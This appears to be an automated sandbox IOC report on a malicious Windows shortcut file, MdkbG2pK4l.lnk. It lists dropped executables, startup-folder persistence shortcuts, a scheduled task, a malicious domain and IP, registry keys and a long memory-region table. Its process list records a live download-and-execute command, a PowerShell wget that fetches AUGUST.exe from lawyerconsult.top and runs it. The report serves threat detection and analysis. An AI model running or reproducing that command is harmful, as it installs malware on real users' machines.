IOC Report
MdkbG2pK4l.lnk

loading gif

Files

File Path
Type
Category
Malicious
MdkbG2pK4l.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=1, Archive, ctime=Mon Aug 26 12:29:30 2024, mtime=Mon Aug 26 12:29:30 2024, atime=Mon Aug 26 12:29:30 2024, length=278528, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu
PE32 executable (GUI) Intel 80386, for MS Windows
modified
malicious
C:\Users\user\AppData\Local\Temp\lejp
PE32 executable (GUI) Intel 80386, for MS Windows
modified
malicious
C:\Users\user\AppData\Local\Temp\paogviura
PE32 executable (GUI) Intel 80386, for MS Windows
modified
malicious
C:\Users\user\AppData\Local\Temp\rjhlrgwt
PE32 executable (GUI) Intel 80386, for MS Windows
modified
malicious
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\hello.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\DZIPR.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\DZIPR.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x0bed3222, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\161ebd1
data
modified
C:\Users\user\AppData\Local\Temp\32f7631
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l31uaxlx.vs2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oduknhyj.r2i.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\eb07f5bb
data
modified
C:\Users\user\AppData\Local\Temp\f5c98f9e
data
modified
C:\Users\user\AppData\Local\Temp\wanynpfhxudgrp
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk (copy)
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
dropped
C:\Users\user\AppData\Roaming\Ruy_driverv2\ekqqtq
data
dropped
C:\Users\user\AppData\Roaming\Ruy_driverv2\ipqtwm
data
dropped
C:\Users\user\ekqqtq
data
dropped
C:\Users\user\ipqtwm
data
dropped
C:\Windows\Tasks\lnfast_x64.job
data
dropped
There are 18 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe
malicious
C:\Users\user\AppData\Roaming\hello.exe
C:\Users\user\AppData\Roaming/hello.exe
malicious
C:\Users\user\DZIPR.exe
"C:\Users\user\DZIPR.exe"
malicious
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 12 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://lawyerconsult.top/AUGUST.exe
172.94.3.25
malicious
fullimmersion777.com
malicious
https://g.live.com/odclientsettings/Prod1C:
unknown
https://www.digicert.c
unknown
http://www.vmware.com/0
unknown
https://www.datanumen.com/zip-repair/
unknown
http://www.symauth.com/rpa00
unknown
https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
unknown
http://www.info-zip.org/
unknown
http://www.vmware.com/0/
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
unknown
http://c0rl.m%L
unknown
http://www.repairfile.com
unknown
http://www.symauth.com/cps0(
unknown
http://support.datanumen.com
unknown
https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
unknown
https://www.datanumen.com/support/
unknown
There are 8 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
lawyerconsult.top
172.94.3.25
malicious
171.39.242.20.in-addr.arpa
unknown
malicious

IPs

IP
Domain
Country
Malicious
172.94.3.25
lawyerconsult.top
United States
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5193000
trusted library allocation
page read and write
malicious
3594000
heap
page read and write
malicious
4F9000
unkown
page readonly
malicious
46FF000
trusted library allocation
page read and write
malicious
57D0000
direct allocation
page read and write
malicious
5574000
trusted library allocation
page read and write
malicious
4F65000
trusted library allocation
page read and write
malicious
556D000
trusted library allocation
page read and write
malicious
5830000
direct allocation
page read and write
malicious
526E000
trusted library allocation
page read and write
malicious
4A62000
trusted library allocation
page read and write
malicious
369000
unkown
page readonly
malicious
5FF0000
direct allocation
page read and write
malicious
C7D000
trusted library allocation
page read and write
malicious
459000
unkown
page readonly
malicious
5C2000
unkown
page write copy
malicious
5500000
direct allocation
page read and write
malicious
31E6000
unkown
page read and write
19D000
stack
page read and write
2E05000
unkown
page read and write
3D45000
unkown
page read and write
400000
unkown
page readonly
6AC6BFE000
unkown
page readonly
FBA000
heap
page read and write
9C000
stack
page read and write
31E6000
unkown
page read and write
174C56D0000
trusted library allocation
page read and write
578D000
direct allocation
page read and write
2D8C000
heap
page read and write
51C4000
heap
page read and write
F54000
heap
page read and write
31E6000
unkown
page read and write
174C1090000
trusted library allocation
page read and write
417000
unkown
page execute read
2658000
heap
page read and write
2960000
heap
page read and write
6FE21000
unkown
page execute read
3FEF000
unkown
page read and write
3D9B000
unkown
page read and write
F57000
heap
page read and write
4F0A000
heap
page read and write
297C000
heap
page read and write
CF0000
heap
page read and write
2E04000
unkown
page read and write
31E1000
unkown
page read and write
C70000
heap
page read and write
4DE7000
heap
page read and write
334D000
stack
page read and write
E00000
heap
page read and write
2BFC000
heap
page read and write
D80000
heap
page read and write
31EF000
stack
page read and write
3002000
unkown
page read and write
27F0000
heap
page read and write
432000
unkown
page readonly
2DD000
stack
page read and write
5CB000
unkown
page read and write
2E04000
unkown
page read and write
2E04000
unkown
page read and write
E29000
heap
page read and write
3DFC000
unkown
page read and write
70135000
unkown
page read and write
2FF0000
unkown
page read and write
27AA000
stack
page read and write
450000
heap
page read and write
31E6000
unkown
page read and write
F3C000
heap
page read and write
6C911000
unkown
page execute read
2E04000
unkown
page read and write
32DD000
unkown
page read and write
5CF000
unkown
page write copy
3F70000
unkown
page read and write
174C5876000
heap
page read and write
35C4000
unkown
page read and write
8C8000
unkown
page write copy
FBA000
heap
page read and write
32F1000
heap
page read and write
58A0000
heap
page read and write
31E6000
unkown
page read and write
174C582D000
heap
page read and write
2CEF000
stack
page read and write
3190000
unkown
page read and write
2D2C000
stack
page read and write
31E6000
unkown
page read and write
5C7000
unkown
page read and write
174C56B0000
trusted library allocation
page read and write
3FAB000
unkown
page read and write
282E000
stack
page read and write
98B000
unkown
page readonly
B30000
heap
page read and write
349B000
heap
page read and write
2AB6000
heap
page read and write
2E04000
unkown
page read and write
40A0000
unkown
page read and write
5641000
unkown
page read and write
6FED1000
unkown
page read and write
D16000
heap
page read and write
2EEE000
unkown
page read and write
2BF0000
heap
page read and write
31E6000
unkown
page read and write
5C8000
unkown
page write copy
37AF000
heap
page read and write
D96000
heap
page read and write
174C55B0000
trusted library allocation
page read and write
70101000
unkown
page execute read
2C80000
heap
page read and write
2E04000
unkown
page read and write
980000
heap
page read and write
2FCB000
heap
page read and write
4B5000
heap
page read and write
6FED5000
unkown
page read and write
D96000
heap
page read and write
2E04000
unkown
page read and write
2AAE000
stack
page read and write
5039000
direct allocation
page read and write
2D80000
heap
page read and write
112F000
stack
page read and write
8A2000
unkown
page read and write
413000
unkown
page readonly
2550000
heap
page read and write
70128000
unkown
page readonly
2E04000
unkown
page read and write
2E04000
unkown
page read and write
104F000
stack
page read and write
6AC67FE000
stack
page read and write
582000
unkown
page write copy
6FE55000
unkown
page read and write
5711000
unkown
page read and write
6FC000
heap
page read and write
3A10000
heap
page read and write
2E04000
unkown
page read and write
2E04000
unkown
page read and write
298F000
heap
page read and write
2E04000
unkown
page read and write
35C4000
unkown
page read and write
D17000
heap
page read and write
3104000
unkown
page read and write
6FE51000
unkown
page read and write
2D9C000
stack
page read and write
2E04000
unkown
page read and write
2B44000
unkown
page read and write
2751000
heap
page read and write
5EA000
heap
page read and write
2A10000
heap
page read and write
28D0000
heap
page read and write
2D34000
unkown
page read and write
57FE000
direct allocation
page read and write
3181000
heap
page read and write
4820000
heap
page read and write
31E7000
unkown
page read and write
5E20000
unkown
page read and write
32A0000
heap
page read and write
2E04000
unkown
page read and write
D08000
heap
page read and write
2E04000
unkown
page read and write
292F000
stack
page read and write
2551000
heap
page read and write
2B44000
unkown
page read and write
D63000
heap
page read and write
174C0075000
heap
page read and write
31F1000
heap
page read and write
41C000
unkown
page execute read
4D2E000
direct allocation
page read and write
19C000
stack
page read and write
2840000
heap
page read and write
2E04000
unkown
page read and write
27F0000
unkown
page readonly
D96000
heap
page read and write
2B2E000
unkown
page read and write
3181000
heap
page read and write
6AC57FE000
unkown
page readonly
6AC637E000
stack
page read and write
5E0000
heap
page read and write
401000
unkown
page execute read
296E000
stack
page read and write
5A38000
unkown
page read and write
70135000
unkown
page read and write
30F0000
unkown
page read and write
40B2000
unkown
page read and write
4B50000
direct allocation
page read and write
174C0F60000
trusted library section
page readonly
174C54F0000
trusted library allocation
page read and write
2A6F000
stack
page read and write
318F000
unkown
page read and write
51EE000
direct allocation
page read and write
31E6000
unkown
page read and write
5820000
unkown
page read and write
D96000
heap
page read and write
2A00000
unkown
page readonly
2E04000
unkown
page read and write
3290000
unkown
page read and write
2E04000
unkown
page read and write
31E6000
unkown
page read and write
2D60000
unkown
page readonly
174C5577000
trusted library allocation
page read and write
D8E000
stack
page read and write
3104000
unkown
page read and write
5A21000
unkown
page read and write
174C00FC000
heap
page read and write
5FE0000
unkown
page read and write
6AC58FC000
stack
page read and write
2DF0000
unkown
page readonly
31E6000
unkown
page read and write
8C8000
unkown
page read and write
5B0000
heap
page read and write
19D000
stack
page read and write
34EB000
heap
page read and write
D17000
heap
page read and write
E44000
heap
page read and write
2E04000
unkown
page read and write
6FE48000
unkown
page readonly
790000
heap
page read and write
2FF4000
unkown
page read and write
DA4000
heap
page read and write
2B44000
unkown
page read and write
174C55B4000
trusted library allocation
page read and write
2B44000
unkown
page read and write
D98000
heap
page read and write
E62000
heap
page read and write
9C000
stack
page read and write
28F8000
heap
page read and write
417000
unkown
page read and write
5225000
trusted library allocation
page read and write
541E000
direct allocation
page read and write
6FEA0000
unkown
page readonly
DA4000
heap
page read and write
EAF000
stack
page read and write
EFA000
heap
page read and write
174C54E0000
trusted library allocation
page read and write
174C0F80000
trusted library section
page readonly
19D000
stack
page read and write
31E6000
unkown
page read and write
70100000
unkown
page readonly
46B7000
heap
page read and write
6C941000
unkown
page read and write
2DCE000
unkown
page read and write
6AC64FE000
unkown
page readonly
5D8000
unkown
page write copy
371F000
unkown
page read and write
CB4000
heap
page read and write
253E000
stack
page read and write
174C0090000
heap
page read and write
2E04000
unkown
page read and write
D17000
heap
page read and write
27BE000
heap
page read and write
4EC1000
heap
page read and write
31E6000
unkown
page read and write
A80000
heap
page read and write
3104000
unkown
page read and write
329D000
unkown
page read and write
2540000
heap
page read and write
511000
unkown
page write copy
2E04000
unkown
page read and write
300F000
unkown
page read and write
320A000
heap
page read and write
34F9000
heap
page read and write
2971000
heap
page read and write
58A000
unkown
page write copy
2E04000
unkown
page read and write
31E6000
unkown
page read and write
3EF0000
unkown
page read and write
36E1000
heap
page read and write
304E000
unkown
page read and write
2B44000
unkown
page read and write
174C5710000
remote allocation
page read and write
174C0113000
heap
page read and write
8C8000
unkown
page read and write
2D80000
heap
page read and write
174C56D0000
trusted library allocation
page read and write
482000
unkown
page write copy
31E6000
unkown
page read and write
31E6000
unkown
page read and write
2E04000
unkown
page read and write
353D000
heap
page read and write
174C55C9000
trusted library allocation
page read and write
174C56C0000
trusted library allocation
page read and write
F4A000
heap
page read and write
174C0913000
heap
page read and write
323D000
heap
page read and write
3D80000
unkown
page read and write
FB8000
heap
page read and write
174C55A0000
trusted library allocation
page read and write
2E04000
unkown
page read and write
3527000
heap
page read and write
2E04000
unkown
page read and write
517D000
direct allocation
page read and write
E00000
heap
page read and write
D96000
heap
page read and write
41A000
unkown
page readonly
2D34000
unkown
page read and write
2D34000
unkown
page read and write
5641000
unkown
page read and write
8C9000
unkown
page read and write
43C000
stack
page read and write
174C00B9000
heap
page read and write
38A0000
heap
page read and write
A10000
heap
page read and write
174C0043000
heap
page read and write
174C5650000
trusted library allocation
page read and write
F30000
heap
page read and write
174C55A0000
trusted library allocation
page read and write
58B000
unkown
page read and write
D00000
heap
page read and write
26AB000
stack
page read and write
6AC647E000
stack
page read and write
36B6000
heap
page read and write
31E6000
unkown
page read and write
7DE000
stack
page read and write
4B90000
direct allocation
page read and write
C70000
heap
page read and write
174BFF90000
heap
page read and write
8D0000
unkown
page readonly
5CA000
unkown
page write copy
E44000
heap
page read and write
31D0000
unkown
page read and write
2B44000
unkown
page read and write
31E6000
unkown
page read and write
31AA000
heap
page read and write
52D000
stack
page read and write
111F000
stack
page read and write
E44000
heap
page read and write
6AC5E7E000
stack
page read and write
E50000
heap
page read and write
326D000
unkown
page read and write
6AC66FE000
unkown
page readonly
2E04000
unkown
page read and write
174C005C000
heap
page read and write
2D30000
heap
page read and write
54FE000
direct allocation
page read and write
3270000
unkown
page read and write
4B0000
heap
page read and write
413000
unkown
page readonly
6AC52F7000
stack
page read and write
CB4000
heap
page read and write
2B8E000
unkown
page read and write
2860000
heap
page read and write
5710000
unkown
page read and write
FBC000
heap
page read and write
174C5640000
trusted library allocation
page read and write
6FEC8000
unkown
page readonly
2D34000
unkown
page read and write
2D34000
unkown
page read and write
283E000
stack
page read and write
6FEA1000
unkown
page execute read
2BEE000
stack
page read and write
8DF000
stack
page read and write
6AC6DFE000
unkown
page readonly
2BAF000
stack
page read and write
2D34000
unkown
page read and write
174BFFC0000
heap
page read and write
561000
unkown
page read and write
3535000
heap
page read and write
2BC0000
direct allocation
page read and write
D17000
heap
page read and write
174C5550000
trusted library allocation
page read and write
31E6000
unkown
page read and write
2A90000
heap
page read and write
31E6000
unkown
page read and write
3DCC000
unkown
page read and write
174C0802000
heap
page read and write
4BA0000
heap
page read and write
5A21000
unkown
page read and write
41A000
unkown
page readonly
2978000
heap
page read and write
A30000
heap
page read and write
311000
unkown
page execute read
5EE000
heap
page read and write
2D24000
heap
page read and write
174C5640000
trusted library allocation
page read and write
2970000
heap
page read and write
174C588C000
heap
page read and write
19D000
stack
page read and write
2D34000
unkown
page read and write
3768000
heap
page read and write
174C0815000
heap
page read and write
5CDE000
unkown
page read and write
2FA2000
heap
page read and write
FA1000
heap
page read and write
330C000
stack
page read and write
342D000
heap
page read and write
2D34000
unkown
page read and write
6AC65FE000
stack
page read and write
5280000
direct allocation
page read and write
174C5849000
heap
page read and write
174C091A000
heap
page read and write
5401000
unkown
page read and write
174C56C0000
trusted library allocation
page read and write
27EE000
stack
page read and write
F31000
heap
page read and write
CCE000
stack
page read and write
2DE0000
direct allocation
page read and write
31E6000
unkown
page read and write
E4E000
stack
page read and write
503D000
direct allocation
page read and write
2869000
heap
page read and write
D96000
heap
page read and write
C80000
heap
page read and write
621000
heap
page read and write
174C0000000
heap
page read and write
31E6000
unkown
page read and write
2EEC000
heap
page read and write
255D000
heap
page read and write
53A9000
direct allocation
page read and write
174BFFB0000
heap
page read and write
5FBF000
stack
page read and write
B38000
heap
page read and write
5489000
direct allocation
page read and write
174C0800000
heap
page read and write
58F000
unkown
page read and write
6AC5EFE000
unkown
page readonly
2D34000
unkown
page read and write
23E0000
heap
page read and write
3226000
heap
page read and write
C80000
heap
page read and write
D80000
heap
page read and write
2E04000
unkown
page read and write
174C14B1000
trusted library allocation
page read and write
2E04000
unkown
page read and write
2B44000
unkown
page read and write
174C57E0000
trusted library allocation
page read and write
2D34000
unkown
page read and write
3710000
heap
page read and write
174C009B000
heap
page read and write
5D1E000
stack
page read and write
3480000
heap
page read and write
174C0E40000
trusted library allocation
page read and write
101F000
stack
page read and write
4030000
unkown
page read and write
2DD0000
unkown
page readonly
174C5710000
remote allocation
page read and write
CB4000
heap
page read and write
578D000
direct allocation
page read and write
2E04000
unkown
page read and write
3188000
heap
page read and write
2B44000
unkown
page read and write
30E0000
unkown
page read and write
2971000
heap
page read and write
31E6000
unkown
page read and write
432000
unkown
page readonly
174C00AC000
heap
page read and write
35C0000
unkown
page read and write
2D34000
unkown
page read and write
357E000
heap
page read and write
F9D000
heap
page read and write
6AC53FE000
unkown
page readonly
580000
unkown
page read and write
2E05000
unkown
page read and write
6AC6CFA000
stack
page read and write
31E0000
heap
page read and write
417000
unkown
page write copy
31E6000
unkown
page read and write
46B6000
trusted library allocation
page read and write
DA4000
heap
page read and write
2E04000
unkown
page read and write
174C0730000
trusted library section
page read and write
296A000
heap
page read and write
31E7000
unkown
page read and write
31E6000
unkown
page read and write
2E04000
unkown
page read and write
5BDD000
unkown
page read and write
2E04000
unkown
page read and write
2E04000
unkown
page read and write
2D34000
unkown
page read and write
174C56A0000
trusted library allocation
page read and write
DA4000
heap
page read and write
349F000
unkown
page read and write
CB4000
heap
page read and write
174C0078000
heap
page read and write
50AE000
direct allocation
page read and write
174C5884000
heap
page read and write
381000
unkown
page write copy
F9F000
heap
page read and write
2D34000
unkown
page read and write
174C0F90000
trusted library section
page readonly
2D34000
unkown
page read and write
798000
heap
page read and write
27C3000
heap
page read and write
E44000
heap
page read and write
174C0F40000
trusted library section
page readonly
5580000
heap
page read and write
31E6000
unkown
page read and write
41BD000
unkown
page read and write
31E6000
unkown
page read and write
2E04000
unkown
page read and write
2B44000
unkown
page read and write
2E04000
unkown
page read and write
57C0000
unkown
page read and write
D16000
heap
page read and write
D10000
heap
page read and write
2D34000
unkown
page read and write
D16000
heap
page read and write
2752000
heap
page read and write
4CEE000
direct allocation
page read and write
6FE59000
unkown
page readonly
174C0F70000
trusted library section
page readonly
31D4000
unkown
page read and write
2B44000
unkown
page read and write
2B44000
unkown
page read and write
6AC5CFE000
unkown
page readonly
2E04000
unkown
page read and write
9C000
stack
page read and write
332F000
heap
page read and write
174C5710000
remote allocation
page read and write
518000
unkown
page readonly
5E0000
heap
page read and write
2D20000
heap
page read and write
3620000
direct allocation
page read and write
368C000
heap
page read and write
FE7000
heap
page read and write
6AC5AFB000
stack
page read and write
31E7000
unkown
page read and write
495C000
heap
page read and write
3382000
heap
page read and write
E30000
heap
page read and write
5524000
trusted library allocation
page read and write
2971000
heap
page read and write
174C5560000
trusted library allocation
page read and write
F1E000
stack
page read and write
174C5865000
heap
page read and write
2D70000
unkown
page readonly
174C5800000
heap
page read and write
174C5861000
heap
page read and write
2CFA000
stack
page read and write
6AC69FE000
unkown
page readonly
5789000
direct allocation
page read and write
31E6000
unkown
page read and write
ECE000
stack
page read and write
27E0000
unkown
page readonly
6AC607E000
stack
page read and write
31E7000
unkown
page read and write
960000
heap
page read and write
392000
unkown
page write copy
52E7000
heap
page read and write
30FA000
stack
page read and write
31E6000
unkown
page read and write
9C000
stack
page read and write
52E3000
heap
page read and write
3E0000
heap
page read and write
2D3A000
stack
page read and write
2B44000
unkown
page read and write
3595000
heap
page read and write
4C79000
direct allocation
page read and write
514A000
trusted library allocation
page read and write
35A3000
heap
page read and write
2E04000
unkown
page read and write
DA4000
heap
page read and write
2951000
heap
page read and write
2E04000
unkown
page read and write
440000
heap
page read and write
FD0000
heap
page read and write
F5B000
heap
page read and write
6FE20000
unkown
page readonly
F3F000
heap
page read and write
6F0000
heap
page read and write
3B0D000
trusted library allocation
page read and write
D96000
heap
page read and write
27A7000
heap
page read and write
D96000
heap
page read and write
DA4000
heap
page read and write
31E2000
unkown
page read and write
174C0073000
heap
page read and write
5660000
direct allocation
page read and write
D5F000
heap
page read and write
2E2C000
stack
page read and write
57FE000
direct allocation
page read and write
6AC6AFE000
stack
page read and write
E40000
heap
page read and write
29C000
stack
page read and write
3181000
heap
page read and write
4174000
unkown
page read and write
2B30000
unkown
page read and write
40FC000
unkown
page read and write
6C938000
unkown
page readonly
E06000
heap
page read and write
3634000
heap
page read and write
2970000
heap
page read and write
2B44000
unkown
page read and write
6AC60FE000
unkown
page readonly
2E04000
unkown
page read and write
2E04000
unkown
page read and write
323A000
heap
page read and write
31A0000
heap
page read and write
3336000
heap
page read and write
2F70000
unkown
page read and write
2D94000
heap
page read and write
EDF000
stack
page read and write
336E000
heap
page read and write
174C5590000
trusted library allocation
page read and write
31E6000
unkown
page read and write
5CE000
stack
page read and write
D13000
heap
page read and write
2E00000
heap
page read and write
320D000
heap
page read and write
D16000
heap
page read and write
3111000
unkown
page read and write
174C0B01000
trusted library allocation
page read and write
2B44000
unkown
page read and write
DAC000
heap
page read and write
29F0000
unkown
page readonly
31E6000
unkown
page read and write
2B44000
unkown
page read and write
C70000
heap
page read and write
31E6000
unkown
page read and write
2E04000
unkown
page read and write
2B44000
unkown
page read and write
D96000
heap
page read and write
2E04000
unkown
page read and write
31E6000
unkown
page read and write
174C0013000
heap
page read and write
5660000
direct allocation
page read and write
4F10000
direct allocation
page read and write
2951000
heap
page read and write
2D34000
unkown
page read and write
DA4000
heap
page read and write
31E6000
unkown
page read and write
CB4000
heap
page read and write
2EE0000
heap
page read and write
820000
heap
page read and write
C70000
heap
page read and write
31E6000
unkown
page read and write
6AC5BFE000
unkown
page readonly
2FF6000
unkown
page read and write
32A9000
heap
page read and write
110F000
stack
page read and write
286B000
heap
page read and write
2E04000
unkown
page read and write
31E6000
unkown
page read and write
2AA0000
heap
page read and write
2D34000
unkown
page read and write
EBE000
heap
page read and write
23F0000
heap
page read and write
2C91000
heap
page read and write
324E000
unkown
page read and write
6AC5C7E000
stack
page read and write
4FE4000
heap
page read and write
2B40000
heap
page read and write
2D50000
unkown
page readonly
5401000
unkown
page read and write
FCE000
stack
page read and write
3368000
heap
page read and write
D17000
heap
page read and write
D17000
heap
page read and write
4F1C000
trusted library allocation
page read and write
32D0000
heap
page read and write
2E04000
unkown
page read and write
2C04000
heap
page read and write
32AD000
heap
page read and write
53AD000
direct allocation
page read and write
19A000
stack
page read and write
3180000
heap
page read and write
6AC59FE000
unkown
page readonly
D90000
heap
page read and write
E44000
heap
page read and write
31D4000
unkown
page read and write
3B09000
trusted library allocation
page read and write
2E04000
unkown
page read and write
EC3000
heap
page read and write
5D1000
unkown
page read and write
3001000
unkown
page read and write
C34000
trusted library allocation
page read and write
D90000
heap
page read and write
548D000
direct allocation
page read and write
DDE000
stack
page read and write
174BFFF0000
trusted library allocation
page read and write
6C945000
unkown
page read and write
5360000
direct allocation
page read and write
3570000
heap
page read and write
4070000
unkown
page read and write
560000
heap
page read and write
3760000
heap
page read and write
2873000
heap
page read and write
4CE2000
heap
page read and write
2867000
heap
page read and write
5C9000
unkown
page read and write
6AC5DFE000
unkown
page readonly
31E6000
unkown
page read and write
3220000
heap
page read and write
2AB8000
heap
page read and write
FA1000
heap
page read and write
F50000
heap
page read and write
51C0000
heap
page read and write
E53000
heap
page read and write
2AA7000
heap
page read and write
2E04000
unkown
page read and write
6AC56FC000
stack
page read and write
5A20000
unkown
page read and write
2A09000
heap
page read and write
5E1E000
stack
page read and write
DA0000
heap
page read and write
174C002B000
heap
page read and write
38E0000
heap
page read and write
F3F000
heap
page read and write
552B000
trusted library allocation
page read and write
6F0000
heap
page read and write
2E04000
unkown
page read and write
308E000
unkown
page read and write
4C7D000
direct allocation
page read and write
31E6000
unkown
page read and write
31E6000
unkown
page read and write
2551000
heap
page read and write
4A1000
unkown
page execute read
E44000
heap
page read and write
2E04000
unkown
page read and write
9C000
stack
page read and write
2E04000
unkown
page read and write
70131000
unkown
page read and write
D16000
heap
page read and write
6AC4D5B000
stack
page read and write
174C0102000
heap
page read and write
E5F000
heap
page read and write
174C5570000
trusted library allocation
page read and write
F42000
heap
page read and write
401000
unkown
page execute read
2E05000
unkown
page read and write
400000
unkown
page readonly
174C006E000
heap
page read and write
2E04000
unkown
page read and write
CB0000
heap
page read and write
3100000
unkown
page read and write
4CBD000
direct allocation
page read and write
337F000
stack
page read and write
5789000
direct allocation
page read and write
388000
unkown
page readonly
174C14E0000
trusted library allocation
page read and write
3221000
heap
page read and write
584000
unkown
page read and write
4BB9000
heap
page read and write
3237000
heap
page read and write
3FF0000
unkown
page read and write
2E04000
unkown
page read and write
4EC000
stack
page read and write
65E000
heap
page read and write
31E6000
unkown
page read and write
174C0902000
heap
page read and write
E44000
heap
page read and write
F7E000
heap
page read and write
CFE000
stack
page read and write
2D00000
unkown
page readonly
F20000
heap
page read and write
3F68000
unkown
page read and write
31E6000
unkown
page read and write
5640000
unkown
page read and write
6AC63FE000
unkown
page readonly
343A000
